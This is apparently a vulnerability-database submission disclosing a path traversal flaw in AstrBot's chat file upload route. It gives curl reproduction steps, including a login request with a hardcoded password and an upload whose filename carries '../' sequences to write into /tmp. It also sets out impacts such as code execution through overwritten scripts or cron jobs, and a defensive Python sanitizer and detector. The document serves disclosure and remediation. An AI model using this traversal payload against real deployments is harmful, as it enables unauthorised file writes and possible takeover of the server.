| Field | Value |
|---|---|
| Title | AstrBotDevs AstrBot latest Path Traversal (CWE-22) |
| Source | ⚠️ https://gist.github.com/YLChen-007/054415c2b63e58813328bc879a90c504 |
| User | Eric-a (UID 96353) |
| Submitted | 2026-04-23 09:31 AM (1 month ago) |
| Moderation | 2026-05-16 07:34 PM (23 days later) |
| Status | Accepted |
| VulDB Entry | 364381 [AstrBotDevs AstrBot up to 4.23.5 File Upload chat.py post_file filename directory traversal] |
| Points | 20 |

# Description

# Technical Details
An Arbitrary File Write vulnerability exists in the `post_file()` method in `astrbot/dashboard/routes/chat.py` (lines 149–163) of AstrBot.
The application fails to sanitize the `filename` field from multipart/form-data uploads before passing it to `os.path.join(attachments_dir, filename)` and `await file.save(path)`, allowing path traversal sequences (e.g., `../../../../tmp/evil.txt`) to escape the intended attachments directory.

# Vulnerable Code
File: `astrbot/dashboard/routes/chat.py` (L149–163)
Method: `post_file()`
Why: The filename from the multipart upload is used directly in `os.path.join()` without applying `os.path.basename()` or `werkzeug.utils.secure_filename()`, allowing directory traversal to write files anywhere the process has access.

# Reproduction
1. Authenticate to obtain a JWT token:

```bash
curl -X POST http://127.0.0.1:6185/api/auth/login -H "Content-Type: application/json" -d '{"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}'
```

2. Upload a file with a traversal filename:

```bash
curl -X POST http://127.0.0.1:6185/api/chat/post_file -H "Authorization: Bearer <TOKEN>" -F "[email protected];filename=../../../../../../../../tmp/pwned.txt"
```

3. Verify the file was written outside the intended directory:

```bash
docker exec astrbot_container cat /tmp/pwned.txt
```

# Impact
- Arbitrary File Write to any path writable by the server process
- Remote Code Execution via overwriting application scripts (`.py` files) or cron jobs
- Denial of Service via overwriting critical system configuration files
- Data Exfiltration enablement through cron/service configuration poisoning
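The fix the report points at (reducing the client-supplied filename to a bare basename before joining it onto the attachments directory) is shown below as an added example; this is not AstrBot's code and not the gist's code. It assumes a hypothetical `ATTACHMENTS_DIR` and adds two layers the report does not spell out: a conservative character whitelist on the basename, and a containment check on the resolved path so that a later change to the sanitizer cannot silently reintroduce traversal. `naive_path_escapes()` reproduces the unsanitized `os.path.join()` pattern from the report purely to show, on the report's own sample filename, why the join alone is insufficient; the value it returns is the kind of check a defender can also use to flag suspicious upload names in logs.

```python
import os
import re
from pathlib import Path

# Hypothetical attachments directory for the demonstration (constructed, not AstrBot's real path).
ATTACHMENTS_DIR = Path("/tmp/astrbot_attachments_example")

# Conservative whitelist: must start with a letter or digit (so dotfiles such as
# ".bashrc" are refused), then letters, digits, '.', '_' or '-', at most 128 chars.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class UnsafeFilename(ValueError):
    """Raised when a client-supplied filename cannot be mapped to a safe path."""


def sanitize_filename(filename: str) -> str:
    """Reduce a client-supplied multipart filename to a bare, conservative name.

    Backslashes are treated as separators too, so a Windows-style '..\\..\\x'
    does not survive on a POSIX host where os.path.basename() would keep it whole.
    """
    if "\x00" in filename:
        raise UnsafeFilename("NUL byte in filename")
    name = os.path.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise UnsafeFilename("empty or dot-only filename")
    if not _SAFE_NAME.fullmatch(name):
        raise UnsafeFilename(f"filename contains disallowed characters: {name!r}")
    return name


def resolve_attachment_path(attachments_dir: Path, filename: str) -> Path:
    """Return the on-disk path for an upload, guaranteeing it stays inside attachments_dir.

    Defence in depth: after sanitizing, the final path is resolved (symlinks included)
    and its parent must be exactly the attachments directory.
    """
    base = attachments_dir.resolve()
    candidate = (base / sanitize_filename(filename)).resolve()
    if candidate.parent != base:
        raise UnsafeFilename("resolved path escapes the attachments directory")
    return candidate


def is_upload_allowed(attachments_dir: Path, filename: str) -> bool:
    """Boolean wrapper suitable for a request handler: True only when a safe path exists."""
    try:
        resolve_attachment_path(attachments_dir, filename)
        return True
    except UnsafeFilename:
        return False


def naive_path_escapes(attachments_dir: Path, filename: str) -> bool:
    """Evaluate the report's unsanitized os.path.join() pattern on a filename.

    Returns True when the joined path, once normalised, no longer lies under
    attachments_dir. Useful as a log-side indicator for upload names worth alerting on.
    """
    base = os.path.realpath(attachments_dir)
    joined = os.path.realpath(os.path.join(base, filename))
    return os.path.commonpath([base, joined]) != base


if __name__ == "__main__":
    sample = "../../../../tmp/evil.txt"  # the report's own sample traversal name
    print("naive join escapes:", naive_path_escapes(ATTACHMENTS_DIR, sample))
    print("sanitized name:", sanitize_filename(sample))
    print("safe save path:", resolve_attachment_path(ATTACHMENTS_DIR, sample))
```

In the handler described by the report, the `path` handed to `await file.save(path)` would be the return value of `resolve_attachment_path()`, and an `UnsafeFilename` would map to a 400 response plus a log entry carrying the rejected name.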